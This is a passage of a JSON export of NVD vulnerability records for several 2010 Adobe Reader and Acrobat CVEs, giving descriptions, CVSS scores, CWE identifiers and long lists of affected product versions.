{"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-10-03T11:57:28", "description": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658.", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-2890", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2890"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-2890", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2890", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3620.\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves an image-parsing input validation vulnerability that could lead to code execution (CVE-2010-3629).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3629", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3629"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3629", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3629", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:27", "description": "Multiple unspecified vulnerabilities in Adobe Reader and Acrobat 9.x before 9.4 on Linux allow attackers to gain privileges via unknown vectors.\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves multiple potential Linux-only privilege escalation issues (CVE-2010-2887).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-2887", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2887"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat:9.3.4"], "id": "CVE-2010-2887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2887", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves a memory corruption vulnerability that could lead to code execution (Macintosh platform only) (CVE-2010-3623).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3623", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3623"], "modified": "2017-09-19T01:31:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:acrobat_reader:8.1.6", "cpe:/a:adobe:acrobat_reader:8.2.2", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:acrobat_reader:8.1.3", "cpe:/a:adobe:acrobat:8.1.5", "cpe:/a:adobe:acrobat:8.0", "cpe:/a:adobe:acrobat:8.2.2", "cpe:/a:adobe:acrobat:8.1.3", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:acrobat_reader:8.1.2", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:acrobat_reader:8.1.7", "cpe:/a:adobe:acrobat:8.1.1", "cpe:/a:adobe:acrobat_reader:8.2.3", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat:8.1.7", "cpe:/a:adobe:acrobat_reader:8.1.1", "cpe:/a:adobe:acrobat:8.2.3", "cpe:/a:adobe:acrobat_reader:8.0", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat_reader:8.1.4", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:acrobat_reader:8.2.1", "cpe:/a:adobe:acrobat_reader:8.1"], "id": "CVE-2010-3623", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3623", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:57:29", "description": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3656.\nPer: http://www.adobe.com/support/security/bulletins/apsb10-21.html\r\n\r\n'This update resolves a denial of service issue (CVE-2010-3657).'", "edition": 3, "cvss3": {}, "published": "2010-10-06T17:00:00", "title": "CVE-2010-3657", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3657"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:adobe:acrobat:8.1.6", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:acrobat_reader:8.2", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:acrobat:8.1.2", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:acrobat_reader:8.1.5", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:acrobat_reader:8.2.4", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:acrobat:8.2.1", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat:8.1", "cpe:/a:adobe:acrobat:8.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:acrobat:8.1.4", "cpe:/a:adobe:acrobat:8.2.4", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", 